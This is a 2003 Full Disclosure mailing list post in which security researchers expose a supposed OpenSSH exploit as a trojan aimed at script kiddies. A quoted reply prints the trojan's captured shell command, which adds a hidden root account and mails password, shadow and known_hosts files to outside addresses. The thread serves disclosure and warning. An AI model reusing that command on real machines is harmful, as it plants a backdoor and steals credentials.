Full Disclosure mailing list archives
Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!*
From: "V.O." <vosipov () tpg com au>
Date: Fri, 19 Sep 2003 20:27:18 +1000
Another good example of why closed-source exploits and "private" exploits are bad (although it is an old story already). The rumours of their existence can make people (or should I say, script kiddies) fall for something like this one. Btw the most definite opinion on the exploit I have heard several times is that there exists one for rooting openbsd, but "it is unstable... we would not show it to anybody because it is so kludgy...etc." W. ----- Original Message ----- From: "Raymond Dijkxhoorn" <raymond () prolocation net> To: "Vitaly Osipov" <vosipov () tpg com au> Cc: <full-disclosure () lists netsys com> Sent: Friday, September 19, 2003 7:40 PM Subject: Re: [Full-disclosure] Re: new openssh exploit in the wild! * is FAKE AS SH@!*
Hi!i looked at this piece of exploit... it is binary so i'am not sure
if
this is a trojan or a backdoor or a virus. but i can't see anything strange while sniffing the exploit traffic. and i got root on
serveral
of my openbsd boxes with that. the bruteforcer seems to be very
good.
which is obviously not true. Btw as far as I understand, the troyan code
is triggered when
the "exploit" is run with the offset specified, and not in a
"bruteforcing" mode.
He most likely means, he rooted some of hhis own boxes where he tired to run the 'exploit'. Nice piece of social engineering.printf("[*] sending shellcode\n")= 22 popen("(echo "sys3:x:0:103::/:/bin/sh" >> /etc/passwd; echo "sys3:\\$1\\$nWXmkX74\\$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:9999 9:7:::" >> /etc/shadow; /sbin/ifconfig -a >/tmp/.tmp;cat /etc/passwd /etc/shadow /root/.ssh*/known_hosts >> /tmp/.tmp; find /home -name known_hosts -exec cat {} >> /tmp/.tmp;cat /tmp/.tmp|/usr/sbin/sendmail -f ownage_at_gmx.de m0nkeyhack_at_supermarkt.de) &> /dev/null ; rm -f /tmp/.tmp;", "r") = 0x0804a6b0Bye, Raymond.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: new openssh exploit in the wild! * is FAKE AS SH@!* Vitaly Osipov (Sep 18)
- Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!* Lars Olsson (Sep 19)
- Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!* christopher neitzert (Sep 19)
- Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!* Raymond Dijkxhoorn (Sep 19)
- Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!* V.O. (Sep 19)
- Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!* Adam Balogh (Sep 19)
- Re: Re: new openssh exploit in the wild! * isFAKE AS SH@!* V.O. (Sep 19)
- Re: Re: new openssh exploit in the wild! * isFAKE AS SH@!* Adam Balogh (Sep 19)
- RE: Re: new openssh exploit in the wild! *isFAKE AS SH@!* Chris Eagle (Sep 19)
- Re: Re: new openssh exploit in the wild! * isFAKE AS SH@!* V.O. (Sep 19)
- Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!* Lars Olsson (Sep 19)